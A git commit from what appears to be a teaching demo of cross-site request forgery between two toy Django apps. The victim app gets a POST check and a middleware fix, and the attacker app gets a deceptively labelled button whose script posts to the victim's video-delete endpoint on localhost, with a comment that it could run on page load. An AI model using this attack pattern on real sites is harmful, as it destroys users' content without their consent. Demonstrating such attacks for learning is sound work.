finalized the CRSF attack

2024-05-14 23:29:02 +02:00 · 2024-05-14 23:29:02 +02:00 · a03a6c8429
commit a03a6c8429
parent 9d6828d5ab
3 changed files with 28 additions and 6 deletions
--- a/TouYube/apps/TouYube/views.py
+++ b/TouYube/apps/TouYube/views.py
@ -3,10 +3,11 @@ from uuid import UUID
 from django.contrib.auth import authenticate, login, logout
 from django.contrib.auth.decorators import login_required
 from django.core.handlers.wsgi import WSGIRequest
-from django.http import HttpResponse, HttpResponseForbidden
+from django.http import HttpResponse, HttpResponseForbidden, HttpResponseBadRequest
 from django.shortcuts import render, redirect, get_object_or_404

 from apps.TouYube import forms, models
+from configuration import settings


 def view_homepage(request: WSGIRequest) -> HttpResponse:
@ -92,6 +93,10 @@ def view_video_delete(request: WSGIRequest, video_id: UUID) -> HttpResponse:
    Delete a video
    """

+    # check the method
+    if request.method != "POST":
+        return HttpResponseBadRequest()
+
    video = get_object_or_404(models.Video, id=video_id)

    # check if the user is the video's author
--- a/TouYube/configuration/settings.py
+++ b/TouYube/configuration/settings.py
@ -12,6 +12,8 @@ https://docs.djangoproject.com/en/5.0/ref/settings/

 from pathlib import Path

+from django.views.decorators.csrf import csrf_exempt
+
 # Build paths inside the project like this: BASE_DIR / 'subdir'.
 BASE_DIR = Path(__file__).resolve().parent.parent

@ -50,7 +52,7 @@ MIDDLEWARE = [
    'django.contrib.sessions.middleware.SessionMiddleware',
    *(("corsheaders.middleware.CorsMiddleware",) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
    "django.middleware.common.CommonMiddleware",
-    *(('django.middleware.csrf.CsrfViewMiddleware') if ENABLE_CROSS_ORIGIN_SECURITY else ()),
+    *(('django.middleware.csrf.CsrfViewMiddleware',) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    *(('django.middleware.clickjacking.XFrameOptionsMiddleware',) if ENABLE_CROSS_ORIGIN_SECURITY else ()),
@ -144,6 +146,5 @@ DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
 if not ENABLE_CROSS_ORIGIN_SECURITY:
    X_FRAME_OPTIONS = 'ALLOWALL'

-
 # Login Settings
 LOGIN_URL: str = "login/"
--- a/Witter/apps/Witter/templates/Witter/homepage.html
+++ b/Witter/apps/Witter/templates/Witter/homepage.html
@ -4,7 +4,23 @@
 {% block body %}
    <h1>Homepage</h1>

-    <a href="http://localhost:8080/video/delete/9cf5f8e6-9333-41de-a913-f4ec2e698a9d/">
-        Je suis un bouton qui ne va sûrement pas supprimer ta vidéo préférée 😊
-    </a>
+    <label>My favorite video's ID that I made: <input id="favorite-video-url" type="text" style="width: 32ch;"/></label>
+
+    <form id="attack-form" method="POST">
+        <button id="attack-submit-button">I am a very safe button that will not delete your video 😊</button>
+    </form>
+
+    <script>
+        // get the objects
+        attack_url_input = document.getElementById('favorite-video-url');
+        attack_form = document.getElementById("attack-form");
+        attack_button_click = document.getElementById("attack-submit-button");
+
+        // when the submit button is clicked, change the endpoint for the target video and send the form
+        // NOTE : this could be done with ANY EVENT (event loading the page), making simply visiting the website dangerous !
+        attack_button_click.addEventListener("click", () => {
+            attack_form.action = "http://localhost:8080/video/delete/"+attack_url_input.value+"/";
+            attack_form.submit();
+        });
+    </script>
 {% endblock %}